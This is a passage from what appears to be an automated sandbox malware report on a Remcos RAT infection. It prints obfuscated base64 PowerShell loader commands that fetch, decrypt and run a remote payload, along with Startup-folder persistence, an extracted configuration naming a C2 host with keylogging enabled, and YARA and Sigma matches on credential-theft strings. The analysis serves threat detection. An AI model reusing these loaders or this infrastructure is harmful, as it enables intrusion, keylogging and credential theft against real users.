3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5348 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 732 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000003C.00000002.3037711043.0000000005E4B000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x7a56a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000046.00000002.4179942082.000000000AFF1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x8b0e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        • 0x12ce6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 99 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.powershell.exe.8a71288.4.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            10.2.powershell.exe.8a71288.4.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              10.2.powershell.exe.8a71288.4.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                10.2.powershell.exe.8a71288.4.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x69308:$a1: Remcos restarted by watchdog!
                • 0x69880:$a3: %02i:%02i:%02i:%03i
                10.2.powershell.exe.8a71288.4.unpackREMCOS_RAT_variantsunknownunknown
                • 0x63594:$str_a1: C:\Windows\System32\cmd.exe
                • 0x63510:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63510:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63a10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x64010:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x63604:$str_b2: Executing file:
                • 0x6444c:$str_b3: GetDirectListeningPort
                • 0x63e00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x63f80:$str_b7: \update.vbs
                • 0x6362c:$str_b9: Downloaded file:
                • 0x63618:$str_b10: Downloading file:
                • 0x636bc:$str_b12: Failed to upload file:
                • 0x64414:$str_b13: StartForward
                • 0x64434:$str_b14: StopForward
                • 0x63ed8:$str_b15: fso.DeleteFile "
                • 0x63e6c:$str_b16: On Error Resume Next
                • 0x63f08:$str_b17: fso.DeleteFolder "
                • 0x636ac:$str_b18: Uploaded file:
                • 0x6366c:$str_b19: Unable to delete:
                • 0x63ea0:$str_b20: while fso.FileExists("
                • 0x63b49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 7 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Suspicious PowerShell Parameter Substring
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0